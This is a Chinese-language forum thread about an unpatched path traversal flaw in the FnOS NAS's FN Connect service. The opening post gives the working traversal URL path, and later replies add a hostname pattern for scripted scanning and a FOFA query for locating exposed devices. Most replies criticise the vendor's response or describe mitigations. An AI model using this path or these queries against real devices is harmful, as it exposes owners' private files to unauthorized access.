飞牛这个漏洞 POC 太容易了啊 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Tink
V2EX    信息安全

飞牛这个漏洞 POC 太容易了啊

  •  
  •   Tink
    PRO
    1 月 31 日 3753 次点击
    打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上

    /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../

    直接就到 /了啊

    太离谱了
    32 条回复    2026-02-01 23:46:21 +08:00
    stinkytofux
        1
    stinkytofux  
       1 月 31 日   3
    0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.
    Tink
        2
    Tink  
    OP
    PRO
       1 月 31 日
    @stinkytofux 官方为什么不强推新版本呢,强制修复漏洞
    Joming
        3
    Joming  
       1 月 31 日
    TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了!
    wfhtqp
        4
    wfhtqp  
       1 月 31 日
    问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了
    wfhtqp
        5
    wfhtqp  
       1 月 31 日   3
    https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。
    YJBZC
        6
    YJBZC  
       1 月 31 日
    @wfhtqp 我草,飞牛官方团队在一个多月前就知道这个漏洞了,到今天都没发个公告或者强制更新修复
    wfhtqp
        7
    wfhtqp  
       1 天前
    @YJBZC 这才哪到哪? fn connect 还开着呢
    labubu
        8
    labubu  
       1 天前 via Android
    不是绑定手机了吗,打电话发短信给用户呗?
    bitkuang
        9
    bitkuang  
       1 天前 via Android
    没复现出来,还有别的条件吧
    haoshuaiwang
        10
    haoshuaiwang  
       1 天前
    写个脚本跑就行了

    {fnid}.fnos.net
    baton
        11
    baton  
       1 天前 via Android   1
    经历过宝塔后就不敢用国内这些面板,安全性是个大问题
    a9htdkbv
        12
    a9htdkbv  
       1 天前 via Android
    还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了
    emoker
        13
    emoker  
       1 天前
    @baton 请教宝塔具体是啥问题?之前没关注过
    AkinoKaedeChan
        14
    AkinoKaedeChan  
       1 天前 via Android
    flyqie
        15
    flyqie  
       1 天前 via Android   1
    是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。
    yinanc
        16
    yinanc  
       1 天前   1
    @flyqie 估计就国内处理问题的一贯思路,装死等这波舆论过去了,就可以当没有发生了
    emoker
        17
    emoker  
       1 天前
    @AkinoKaedeChan 感谢大佬
    stinkytofux
        18
    stinkytofux  
       1 天前
    ryd994
        19
    ryd994  
       23 小时 3 分钟前 via Android
    我相信有很多人就是图个 fnconnect 的方便。这下好了,不能开公网,不能用 fnconnect ,结果还是要自己配置 VPN/zerotier 。

    我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问,后者经过 zero trust 的鉴权。所有不登入就能访问的服务(比如 BT )都跑在容器里。
    hanguofu
        20
    hanguofu  
       16 小时 41 分钟前
    @ryd994 : 请问你是自己买了一个域名并用 cf 代理吗 ?
    sardina
        21
    sardina  
       16 小时 2 分钟前
    2025-12-25 18:06:25 只看该作者回复
    感谢反馈我转给负责的同事看看
    一个月前就说反馈 结果还没修复。。。
    Curtion
        22
    Curtion  
       15 小时 50 分钟前
    还真是, 直接在 fofa 搜索 5666 端口,随便找一个进去就能访问到文件了。。 我觉得飞牛应该强制关闭 fn connet ,直到用户升级系统。
    MiKing233
        23
    MiKing233  
       15 小时 41 分钟前
    @flyqie 说做不了是不可能的, 哪怕临时停止解析 5ddd.com 这种 FN Connect 域名也可以尽可能减少漏洞利用范围, 我真没看明白他们除了在论坛发帖忽悠小白之外究竟还采取了哪些主动的安全挽救措施
    MiKing233
        24
    MiKing233  
       15 小时 39 分钟前
    @flyqie 以及漏洞被大规模利用已经过去超过了一天一夜, 我不知道他们公司的老板和法人是怎么睡得着觉的
    panda188
        25
    panda188  
       13 小时 50 分钟前 via Android
    不会降本增效,已经把负责这个,会这个的裁了吧?
    hatch
        26
    hatch  
       11 小时 37 分钟前
    作死,估计内部也一团糟,问题流转半天找不到能挑担的人
    bluekz
        27
    bluekz  
       10 小时 22 分钟前
    @wfhtqp #4 啊?不打开 fn connect 和 ddns 等任何外网方式也能暴露什么?
    povsister
        28
    povsister  
       8 小时 10 分钟前   1
    好几天了官方反代甚至不愿意上个 WAF 救一救后面的用户。哎
    chinni
        29
    chinni  
       7 小时 8 分钟前
    其实现在点什么目录基本都 404 也没啥了,但是确实坑,不如直接用 zero trust
    Tink
        30
    Tink  
    OP
    PRO
       6 小时 12 分钟前
    @chinni 点链接没用的,手拼目录名到 url 可以
    quu
        31
    quu  
       4 小时 20 分钟前
    @Curtion fofa 可以再精准点

    (port="5666")&& icon_hash="470295793" icon + 端口验证
    someonesnone
        32
    someonesnone  
       3 小时 28 分钟前
    @chinni #29 你别直接点链接, 你把目录名手动放在../../xxx 试试...
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     951 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 25ms UTC 19:15 PVG 03:15 LAX 11:15 JFK 14:15
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86